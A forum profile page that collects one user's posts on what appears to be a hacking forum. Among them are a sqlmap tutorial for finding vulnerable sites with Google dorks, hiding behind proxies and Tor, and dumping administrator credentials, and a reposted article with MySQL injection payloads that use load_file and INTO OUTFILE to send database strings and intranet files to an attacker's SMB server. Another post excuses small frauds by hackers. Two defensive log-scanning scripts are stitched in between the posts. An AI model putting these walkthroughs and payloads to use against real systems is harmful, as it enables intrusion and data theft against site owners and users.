
Paul4games

Active Members
Posts: 1642
Days Won: 4

Everything posted by Paul4games

  1. @root_prime because maybe I'm wrong and others can correct me, and maybe they have a better understanding of this. @TheWiner you can always close the tab with this topic if something doesn't suit you and you just want to make one more post.
  2. Now I understand, tromfil, what you meant; yes, that is also a perspective, but there are still plenty of intelligent people who are insulted and discouraged by the less intelligent. Because of this, many have reasons to believe they are losers if they are almost always criticized by others who don't see themselves. As someone said: "To realize you're stupid you need some intelligence".
  3. @Tromfil let's talk seriously, there aren't very many cases of the kind of people you gave as an example; I think most of us go out into the world (a beer with friends / a football game / a party / etc.).
  4. @Skiddie from what I can see you have nothing to do with the topic. @bogdan yes, I didn't realize it at the moment and I didn't write that sentence well, I had too many ideas in my head and mixed them up. @nedo yes, you're right about children and adults.
  5. Formatting the text doesn't work with EDIT either, and yes, I searched for documentaries and things like that, but most of them don't really relate to what I wrote here. Did you at least read what I wrote? And if you didn't like it, you can always stop reading and close the tab with this topic.
  6. Lately I have kept thinking about this: why are hackers seen as gods through the eyes of a child but as criminals through the eyes of an adult? I kept wondering why someone who seeks knowledge, who is enthusiastic and curious about how things work, who tries to understand them and wants to know what lies behind that simple login prompt, why that error appeared and how it can be exploited and fixed, what is inside that website, someone who does it to feed his hunger for knowledge and not for money, is considered a criminal, an offender, by those who don't even understand what he does and don't even try to understand what he represents. What is it like to try to break into a site for a whole day just to surpass your limits and be able to say "I did it, I got access!", and afterwards to be called a criminal by people who don't even know you, who don't know what kind of person you are, how smart you are and what you can do with just your mind? We are seen by society as dangerous criminals who should be locked up because we are smarter than most of those who don't understand us; because we are a direct threat to various governments and powers, since our information and intelligence allow us to do what anyone could do if only they had bothered to learn how; because we do what we believe is right and not what they want us to believe; because we are different from the others and harder to manipulate and enslave; because we are not understood by the others, and those like us must be removed and locked up for the simple fact that we wanted to know more, because we strove to understand how the wheel works and why it turns, because we were curious and learned what is forbidden but is like a drug for us. For this we must be locked up? Because we hold knowledge forbidden by laws made by those who think the browser is the whole internet, that Windows is the computer?
I have come to the conclusion that the following things make people believe we are criminals: 1. The mass media has been manipulating people for a very long time, and that is our case too. People have been made to believe through the news/newspapers that we are criminals because we "broke" a site, but they almost always "forget" to mention our motives, "forget" to say that we didn't break anything, didn't cause any damage, we just wanted to see what was hidden inside and made a public disclosure without affecting the system in any way! 2. Humanity fears what it doesn't know; there aren't many people who want to explore the unknown and understand it, and the same happens with us: most of the population doesn't want to understand us. 3. People don't distinguish between us and those who deal in fraud (carders) because nobody tries to explain the difference to them... of course, maybe we also commit some fraud to earn some money/items, because not all of us live in luxury villas and wear only brand-name clothes; a little extra income doesn't hurt anyone. Some of us don't want to depend on parents who are like everyone else (they don't understand us even if you try to explain n times), or maybe we want to pay for college but don't have enough money, so we try to earn something from all we have learned, but we DON'T cross the line, we DON'T commit frauds of thousands of dollars and we are NOT greedy.
4. As I said at the beginning of this topic, in the eyes of a child we are seen as gods because he still has that desire for knowledge and wants to become like us; I think most of us started at fairly young ages and learned out of pleasure and a desire for knowledge (let's not neglect money: time passes, we mature, money comes into play and we will do various things for money too, but helping someone for a fee seems perfectly normal to me if he isn't your friend). Adults have already lost their desire for knowledge and have already been manipulated by the mass media; few of them still want to understand us and be like us, other problems have appeared that concern them 100 times more than being like us (having food to give your kids, going to work because if not you then who?). 5. The so-called "script kiddies" who ruin our image through their attempts to make a name for themselves and become famous by various methods: defacements without reason, destroying someone else's work and many other things. We try to fight them and keep them away from us, but they keep coming like flies to shit. What do you think, why are we considered criminals and what should we do to improve our image? PS: I read a manifesto written by a guy with the nick "The Mentor" which made me think a lot and shocked me by how right the man was, even though he wrote this manifesto in 1986, when I wasn't even born: .:: Phrack Magazine ::. EDIT: I don't know why the text alignment got screwed up after I hit submit....
  7. Xander, in the time you will be left without a computer, learn electronics and build your own computer, but you name it "muieguvernul" and there is not much they can do to you....
  8. A very good report; it is your right to use something you paid for and which shouldn't be owned by anyone.
  9. If you get it from the official site it is 100% clean; it is still the first version and has bugs, so if you find one or it can't decode a file, make a thread on decodeby.us.
  10. One of the best tutorials about XSS: http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG09_(english).pdf
  11. Last time we were using SQLMAP from the Windows platform and could not realize its full potential, so today I will be trying to teach you how to use it from the Linux platform to take advantage of all that it has to offer. Full: Kaotic Creations: Owning the Database with SQLMAP and METASPLOIT
  12. 1) You need to be safe, so this is crucial. I assume you already have a trusted VPN connected, and now to be extra ninja we are also going to route traffic through proxies. We can accomplish this by simply setting the '--proxy=PROXY' parameter, which will enable the use of proxies during scanning. EX: sqlmap.py -u http://site.com/example.php?id=1 --proxy=http://proxysite.com:PORT You can also supply credentials with the '--proxy-cred=user:pass' argument.
2) You can speed up scans by increasing the THREAD count, since the default is set to 3 requests at a time.
2a) If you set this beyond the default you may want to also set the '--delay=DELAY' parameter to allow some strategic delays between requests (or to speed up even further, although I have a feeling this leads to errors which other tools are prone to (cough..Havij)).
2b) You can use the '-o' switch to enable all of the optimization features at once.
2c) If you are performing time-based attacks or blind injections then it may be a better idea to leave the thread count alone and use the '--predict-output' argument, which will save you a bit of time and will allow SQLMAP to perform some analysis on found results in the session file to help speed things up (it can slow things down in other scenarios, where the '-o' option is the much better choice).
3) You can have the tool load different USER-AGENTs in case a site or page has restrictions based on browser type. This can be accomplished by adding the '-a <insert/path/to/file>' parameter to your command string. It needs to be followed by the path to the file containing the USER-AGENTs to be used. You can run a few searches on Google to find some common ones or how to come up with your own custom USER-AGENT.
NOTE: this may have been replaced by --user-agent=<insert user agent details> with the latest update.
3a) There is a default list provided with the installation that you can add to or see how they are modeled, located at: '~\sqlmap\txt\user-agent.txt'
3b) You can also just let SQLMAP do the deciding by issuing '--random-agent'.
4) If you need to fake out the referer in the request due to restrictions on the server side, you can change the default values by using '--referer=<http://www.insert/REFERER/page/.com/>'.
5) Need credentials to perform a more in-depth scan? No problem! We can set the credentials using '--auth-cred' followed by credentials in the typical 'user:pass' format. EX: --auth-cred=user:password or --auth-cred=admin:IhazYourPazword!
6) You can load targets using GOOGLE and DORKS by using the '-g' argument followed by the search dork in quotes "". EX: sqlmap.py -g "inurl:index.php?id= site:us" NOTE: It will work on any targets found in an interactive manner, but only the arguments passed with the original command will be used on each target, so make sure you use some basics but not too much. EX: sqlmap.py -g "inurl:index.php?id=" -b --current-user --current-db --is-dba --dbs
6a) You can also process more than one site request at a time from a file by changing the standard '-u' to '-r <path/to/load/HTTP/requests/from/>'.
7) You can save and resume scans and data retrieved in the session file (in the "output" folder) to save time, or to pick things back up where you last left off. You need to use the '-s <insert/path/to/session/file>/session' parameter to tell it where to look to parse results from. NOTE: Point it directly at the session file and not just the folder it is in or it won't load properly. You can also use the recorded scan details to learn a LOT. It contains info on the queries used to get all the details as well as everything found, so it is a good reference and learning tool (all dumps are converted to .CSV files, which are above and beyond the log and session files that are saved).
8) You can use the '--eta' parameter to have the scans keep an ETA so you have an idea of how long things are going to take. This comes in handy when doing dumps of a database to give you an idea of how long it thinks it will take (very useful when blind, or when trying to make a determination as to whether or not it makes sense to dump a questionable table in full or just what you need. Remember, if it looks like it will take too long you can use the '-s' argument to pick it back up later; see step 7 above).
9) You can use '--flush-session' to clear out the results stored for a session file if you need to just start over, or in case the admin has come along and made some changes since your last visit.
10) The last one I will leave you with is very important if you are working on a Linux machine, like Backtrack: make sure you have the latest version of SQLMAP, as it is constantly being worked on and new developments are constantly being released. This can be accomplished by a quick addition of the '--update' argument. EX: sqlmap.py --update NOTE: if you are working on Windows then you can either check the SQLMAP homepage often for an updated version to download, or you can try the Windows SVN client called TortoiseSVN GUI, which can be found here and is available for both 32 and 64 bit computers: TortoiseSVN. You just download and install, then navigate to the SQLMAP install folder in Windows Explorer and you will now have a green icon next to those folders that can be updated by SVN. Just right click and choose the option to SVN Update folder contents. Once it is done you have an updated copy.
BONUS Material:
1) When attacking version 4 databases with no information schema to rely on, there are still several options with SQLMAP:
1a) You can use the '--common-tables' and '--common-columns' arguments to try and bruteforce the table and column names. The default list is much greater than Havij and other tools and can easily be added to if you want to beef it up; it, as well as many others used, can be found at: ~\sqlmap\txt\*.txt
2) If you don't get any positive results from injection but you have a gut feeling that the site is vulnerable, then you can try increasing the '--level' or '--risk' arguments beyond the default level of 1. When you do this it will allow SQLMAP to perform more intense attacks and check for additional injection points such as the cookie field, user-agent field, and even the referer field. I typically will add '--level 3 --risk 3' to my command string if I don't get what I am looking for and have a strong feeling there is an injection point that is somehow being overlooked.
3-X) Updates recently introduced:
'--batch' allows you to walk away from the terminal and let SQLMAP make all of the decisions on your behalf for all instances where it would usually prompt for interaction, a true hands-free experience.
'--schema' which can be used to enumerate the databases or schema.
'--parse-errors' which tells SQLMAP to parse the error messages from response pages received from queries - helpful when using google dorks.
'--mobile' which, like the user-agent argument, allows SQLMAP to act as if it was a mobile device, which can be handy in testing many of the new mobile.site.com spin-off domains to help reach ever expanding consumer markets with very little concern for security or sanitization.
Last, but certainly not least, as this can be very helpful in adding to YOUR security: '--tor' which enables SQLMAP to perform queries through the default TOR proxy setup address.
Mini-Tutorial on --forms: So you want to inject a search form or try to bypass a basic login page (with the typical two input fields such as user and pass); you can either pass to sqlmap the request in a request file (-r) as noted above, or you can set the $POST data accordingly using the '--data' argument,... ...or let SQLMAP do it for you! Both user and pass from the above example, as do others in real life, appear as <form> and <input> tags in HTML code. This is where this switch will get to perform its handy work. Provide SQLMAP with '--forms' as well as the page where the form can be found as the target url '-u', and SQLMAP will do the rest, by parsing the forms it has found on the page provided and interactively guiding you through testing for SQL injection on the form input fields (rather than performing a normal injection scan on the site provided by '-u'). Hope these help you with the tool SQLMAP a little bit more.
Still working on adding some more instructions and tutorials regarding the additional features that interact with the filesystem, system registry, and actual command execution with a little help from Metasploit. I am also planning a separate short article on how to perform injections via $POST. Source: Kaotic Creations
  13. There are times when manual efforts just won't work or you plain don't have the skills, and other famous tools like Havij don't seem to do the trick either. I experienced one of these times recently and it led me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to the timing method sucking and I don't have the skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now, because there is no GUI for this and I don't think there ever will be. If you really want to hack you need to get familiar with it, so why not start now. Let's begin... There is no need to waste time with $hitcash and other download sites. For a stable and virus-free copy just get it from the official site here: sqlmap: automatic SQL injection and database takeover tool. You will simply extract this to the desired folder you want to run and use it from. As mentioned this is a command line tool, NO GUI. If you want to add it to your path variable so you can run it from anywhere the command prompt opens, follow these simple steps:
1) Right click on Computer and choose the Properties option.
2) In the System window click on Advanced system settings in the left pane.
3) In the System Properties window select the Advanced tab and click on Environment Variables.
4) In the Environment Variables window you will notice two columns, User variables for a username and System variables - we need the user variable for the PATH so it knows where to open the program wherever we decide to open CMD from.
5) Now to add a PATH to the User variable, highlight PATH and click on the New… button. In the New User Variable dialog box type the Variable name and Variable value and click the OK button. If you are unsure you can choose to edit the PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFUL); now just add the path to sqlmap.exe to the end and you're done, hit OK and save.
5a) To remove a User variable click on the required User variable and then click on the Delete button.
5b) To edit a User variable click on the Edit… button. In the Edit User Variable dialog box edit the Variable name and Variable value and click the OK button.
NOTE: you can skip the path variable part if you want, but then you must be in the folder to run it from the command line (I am lazy and don't like to navigate so I like to set it and forget it).
OK, now you should be ready to get started... open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and putting them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows; you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side. I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. We will use the '-u' option to define our target site, like this: EX: sqlmap -u http://site.com/example.php?id=1 Results... PHP 5.2.14, Apache 2.2.17, MySQL 5. This will perform a basic run at the target to test for injection, simply providing basic overview info.
We can use the '-f' parameter to get some more specific information from our target, like this: EX: sqlmap -u http://site.com/example.php?id=1 -f Results are not too much more than previous (you get the column count or vulnerable column if you pay close attention to the info retrieved, as well as specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesn't really tell us a lot, so let's grab the site banner to see what it can tell us, as well as some other useful info from the database itself, by changing up the command and adding a few more parameters, like so: EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs Results: NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you don't get the rest. For this reason I usually start with the above command and then start to change from there to get more info... This pretty much gets you set up with the basic info; you can go a step further and add '--passwords' to the end of the command to try and extract the users' passwords for database users if they are available. This is not always effective though (i.e. no MySQL table), which is why it is best to add it after the basics or at the end of your recon session, like so: EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs --passwords OR by itself following our recon command like this: EX: sqlmap -u http://site.com/example.php?id=1 --passwords You can also check user privileges with '--privileges' as well as roles with '--role'..., but what if you want to dig deeper into the database(s) to find more info? No problem.... let's keep going and extract all of the table names and columns...
Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this: EX: sqlmap -u http://site.com/example.php?id=1 --tables -D database1 Results.... it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen. The results would look something like this: .... and so on until it is done finding all of the tables for the database you specified with the '-D database1' parameter earlier... and now we find the columns for the tables found above... EX: sqlmap -u http://site.com/example.php?id=1 --columns -D database1 -T administrator Results.... remember you can check your logs in the "output" folder... The results would look something like this: .... and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' parameters earlier... BUT now you may be asking yourself, how do we get that precious data out of there? Like this: EX: sqlmap -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C user,pass,id Results.... remember you can check your logs in the "output" folder... The results would look something like this: That sums up our basic introduction to SQLMAP. Ideas for the next series... SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of Metasploit into the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series... Source: Kaotic Creations
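Posts 12 and 13 above describe the knobs that shape sqlmap's traffic (thread count, custom or random User-Agents, --level/--risk extending probes into cookies and referers). What that traffic looks like from the web server's side is the useful thing for the person on the other end of the connection, so here is an added example, not from Kaotic Creations or the sqlmap project, of a small Python detector run over constructed Apache combined-log lines: it URL-decodes each query string, scores common injection-probe shapes, notes sqlmap's default User-Agent, and flags a client IP once its suspicious request count crosses a threshold. The log lines, documentation IPs, the 'sqlmap/1.0-dev' agent string and the threshold are constructed assumptions for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator patterns tested against the URL-decoded query string. These are
# deliberately broad heuristics of the kind a WAF or SIEM rule uses; tune per app.
INDICATORS = [
    (re.compile(r"\bunion\b.*\bselect\b", re.I), "union-select"),
    (re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I), "time-based"),
    (re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I), "boolean-tautology"),
    (re.compile(r"\binformation_schema\b", re.I), "schema-enumeration"),
    (re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I), "file-access"),
    (re.compile(r"'"), "quote-probe"),
]


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    _, _, query = rec["target"].partition("?")
    rec["query"] = unquote_plus(query)  # decode %27, %20, + etc. before matching
    return rec


def classify_request(rec):
    """Return the indicator names that fire for one parsed request."""
    hits = [name for pat, name in INDICATORS if pat.search(rec["query"])]
    if "sqlmap/" in rec["ua"].lower():  # default agent; absent when --random-agent is used
        hits.append("sqlmap-user-agent")
    return hits


def analyze(log_text, threshold=3):
    """Aggregate per client IP and flag an IP that sends `threshold` or more
    suspicious requests, or that announces itself through the sqlmap User-Agent."""
    per_ip = defaultdict(lambda: {"requests": 0, "suspicious": 0, "indicators": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        hits = classify_request(rec)
        if hits:
            stats["suspicious"] += 1
            stats["indicators"].update(hits)
    flagged = {}
    for ip, s in per_ip.items():
        if s["suspicious"] >= threshold or "sqlmap-user-agent" in s["indicators"]:
            flagged[ip] = {"requests": s["requests"], "suspicious": s["suspicious"],
                           "indicators": sorted(s["indicators"])}
    return flagged


# Constructed sample traffic (documentation IPs, no real site): one client probing
# example.php?id= the way the posts describe, and one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2012:10:00:01 +0000] "GET /example.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2012:10:00:02 +0000] "GET /example.php?id=1%27 HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [10/Jan/2012:10:00:02 +0000] "GET /example.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2012:10:00:03 +0000] "GET /example.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2012:10:00:05 +0000] "GET /example.php?id=2 HTTP/1.1" 200 488 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

The User-Agent check is the weakest signal, since the post itself notes --random-agent and --user-agent replace it; the per-IP count of decoded payload patterns is what survives that, and it is also what the higher --level/--risk settings cannot hide, because the cookie and referer probes they add carry the same shapes and can be scored the same way from a log that records those headers.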
  14. I found this blog a few days ago and it has a bunch of interesting articles: Ack Ack « Go beyond the impossible!
  15. Over the past week I have been busy in the lab developing new attack vectors for MySQL injections by using the inter-protocol capability of the load_file() function. With load_file() you are able to load files from another machine over SMB; this happens through the underlying system's SMB client. A basic load_file() over SMB looks like this:
select load_file("\\\\[ip | server_name]\\filename");
But this will also initialize an SMB connection:
select 1 INTO OUTFILE "\\\\[ip | server_name]\\filename";
In fact, Fredrik wrote about this INTO OUTFILE problem as a way for malware to spread easily in internal networks. After playing around I found ways of using concat() inside load_file(), which made MySQL injections look like this:
select load_file(concat("\\\\[ip | server_name]\\", version()))
Which made everything so much easier; with this we can entirely abandon the stupid delay attacks with benchmark techniques, blind MySQL injections and maybe even replace the current basic MySQL injections because of the ease of the queries, and you don't even have to look at how many columns are selected. Now the other side of the injection: it uses the default SMB client, which means that if you are able to exploit this thing while it connects to you, you can do a lot more with the system. I coded an SMB server for this in Python and inserted for now just 2 exploits (but more will come, I suppose, since I will be maintaining this program and making it stable over the next couple of weeks). The program can be found here. For now I embedded the following exploits: MS10-020 stack overflow Windows 7/2008R2; trans2 response stack overflow Win7_remote_kernel_boom; NetBIOS length field crash. Here is a screenshot of MS10-020 in action to give you a basic idea of what I am talking about. Okay, that was just a little sidestep, but this program is basically for grabbing the strings which are being defined in the MySQL injection. It will look something like this.
You let the server connect to you over port 445 with its favorite SMB client, you catch what happens and you won. This trick is basically also possible with bigger files instead of just tiny strings by using INTO OUTFILE; in fact you can just dump entire files from the local network that way. Example:
http://extranet/index.php?id=1 UNION ALL SELECT 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\Your_SMB_server\\test";
This will proxy the file in the intranet over SMB to you. I suppose this is not only working on MySQL, and with investigation I suppose you can go out of band in similar ways in other database-level programs; this is just to break the ice and make you realize how useful it is when you are capable of going out of band with SMB. Blind MySQL injections are a lot better to exploit this way because you are capable of defining entire strings and not having to calculate every single character based on true/false responses or with delay tricks, and client-side SMB exploitation will have a much bigger future with the introduction of this. I hope I provided enough information here for you to have as much fun with this as I did over the past few days, and keep me posted if you find other cool tricks possible with this feature. Author: Jelmer de Hen Source: Ack Ack « Go beyond the impossible! I found the article very interesting, and the blog also has lots of quality posts. Oh, and I almost forgot: hen also created a toolkit to make an SMB server on your PC: MySQL network exploitation toolkit 1.1
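The load_file()/INTO OUTFILE trick in the post above leaves a distinctive trace on the database side: a file function whose string argument, once MySQL has unescaped it, is a UNC path to a network host. As an added example that is not part of Jelmer de Hen's article or his toolkit, the Python below scans constructed general-log style lines for exactly that, undoing the backslash escaping of the SQL literal before testing whether it names a remote host, and also interprets the secure_file_priv setting that confines these functions. The log layout ('<time> <conn_id> Query <sql>'), the connection ids, the hosts and the queries are constructed assumptions.

```python
import re

# Matches load_file('<literal>'), load_file(concat('<literal>', ...)),
# INTO OUTFILE '<literal>' and INTO DUMPFILE '<literal>', case-insensitively.
FILE_OP_RE = re.compile(
    r"\b(?P<op>load_file\s*\(|into\s+(?:outfile|dumpfile))\s*"
    r"(?:concat\s*\(\s*)?(?P<quote>['\"])(?P<target>.*?)(?P=quote)",
    re.IGNORECASE | re.DOTALL,
)

# A UNC path after unescaping: \\host\... or //host/... (both forms are accepted on Windows).
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]")


def sql_unescape(literal):
    r"""Undo MySQL backslash escaping inside a string literal, so the SQL text
    '\\\\host\\file' becomes the path \\host\file that the server would actually open."""
    return re.sub(r"\\(.)", r"\1", literal)


def find_file_ops(sql):
    """Return every file operation in one statement, with its unescaped target
    and whether that target is a UNC (network) path."""
    ops = []
    for m in FILE_OP_RE.finditer(sql):
        op = " ".join(m.group("op").lower().replace("(", "").split())
        target = sql_unescape(m.group("target"))
        ops.append({"op": op, "target": target, "unc": bool(UNC_RE.match(target))})
    return ops


def scan_general_log(lines):
    """Walk general-log style lines ('<time> <conn_id> Query <sql>', a constructed
    layout for this example) and return one alert per UNC-targeted file operation."""
    alerts = []
    for line in lines:
        parts = line.split(None, 3)
        if len(parts) < 4 or parts[2] != "Query":
            continue
        ts, conn, _, sql = parts
        for op in find_file_ops(sql):
            if op["unc"]:
                alerts.append({"time": ts, "conn": conn, "op": op["op"],
                               "target": op["target"], "sql": sql})
    return alerts


def classify_secure_file_priv(value):
    """Interpret MySQL's secure_file_priv: NULL disables LOAD_FILE and INTO
    OUTFILE/DUMPFILE entirely, a directory confines them to that directory
    (paths outside it are refused), and an empty string leaves them unrestricted."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


# Constructed sample general-log lines (not real traffic): connection 12 mirrors the
# injection shapes in the post, connection 13 is a legitimate local export.
SAMPLE_LOG = [
    "2012-01-10T10:00:01 12 Query SELECT id,name FROM products WHERE id=1",
    r"2012-01-10T10:00:02 12 Query SELECT load_file(concat('\\\\203.0.113.9\\', version()))",
    r"2012-01-10T10:00:03 12 Query SELECT 1,2,load_file('\\\\intranet\\filename'),3,4 INTO OUTFILE '\\\\203.0.113.9\\test'",
    "2012-01-10T10:00:04 13 Query SELECT load_file('/var/lib/mysql-files/report.csv')",
]

if __name__ == "__main__":
    for a in scan_general_log(SAMPLE_LOG):
        print(f"{a['time']} conn={a['conn']} {a['op']} -> {a['target']}")
    print("secure_file_priv='' is", classify_secure_file_priv(""))
```

Two server-side controls remove the trick at its root rather than only detecting it: both LOAD_FILE() and INTO OUTFILE require the FILE privilege, which the web application's database account should not hold, and secure_file_priv set to a dedicated local directory (or NULL) makes the server refuse a UNC target even for an account that has it. The query-side scan above is what remains useful where neither setting can be changed, and it fires on the exact statement shapes from the post, including the concat() variant.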
  16. Note that this is v2; there is also a version 2 that grabs more names.
  17. Good luck, and about tinkode I don't really know what to say, we'll see....
  18. Happy New Year!
  19. I don't really think this guy found the exploit; I read about this vulnerability a month or so ago on his blog: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r
  20. They can be found; the problem is that most either have a captcha or only work on 1 network/country.
  21. I haven't tested it, but if it has no captcha after n SMS messages and works internationally, then a program can be made very easily; if it really does, I'll make it tomorrow, I just need to know that it works and has no captcha.
  22. If you need power, why don't you use some RDPs?
  23. Does the country/OS matter?
  24. Please add the tags to every piece of code so it can be read properly.
  25. Cartus, send me a PM with your ID so we can discuss the details and I'll sort you out.